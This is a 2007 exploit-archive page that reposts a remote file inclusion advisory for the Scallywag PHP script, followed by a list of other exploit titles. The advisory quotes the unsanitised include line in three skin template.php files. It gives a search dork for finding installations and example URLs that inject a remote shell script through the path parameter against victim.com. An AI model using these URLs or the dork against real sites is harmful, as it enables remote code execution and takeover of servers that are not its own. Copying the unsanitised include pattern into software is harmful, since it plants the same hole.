exploits , vulnerabilities , articles , Scallywag (template.php path) Remote File Inclusion Vulnerabilities

2007-05-23

Scallywag (template.php path) Remote File Inclusion Vulnerabilities

Rated as : Moderate Risk

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                    
                     #
#                                                                         
                  # 
#Dork:"Powered by Scallywag"                                    
                            #
#                                                                         
                  #
#                                                                         
                  # 
##############################################################################################
#Vuln Code                                                                
                  #  
#                                                                         
                  # 
#ERROR1:skin/dark/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG1:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################

#                                                                         
                  # 
#ERROR2:skin/gold/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG2:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################
#                                                                         
                  # 
#ERROR3:skin/original/template.php                                        
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     #
#                                                                         
                  # 
#                                                                         
                  # 
#BUG3:                                                                    
                  # 
#                                                                         
                  # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL
Script]]           #
##############################################################################################
#                                                                         
                  # 
#Script Download                                                          
                  # 
##############################################################################################
#                                                                         
                  # 
#http://www.woweb.ru/load/82-1-0-3791                                     
                  # 
#                                                                         
                  # 
##############################################################################################

#                                                                         
                  # 
#Cyber-Security                                                           
                  # 
#                                                                         
                  # 
##############################################################################################
##############################################################################################
securitydot.net - 2007-05-23

Exploits - newest 10 RSS | More

2007-06-15 55498 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32847 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40878 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28513 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19076 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16129 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18739 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16018 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32685 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16646 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit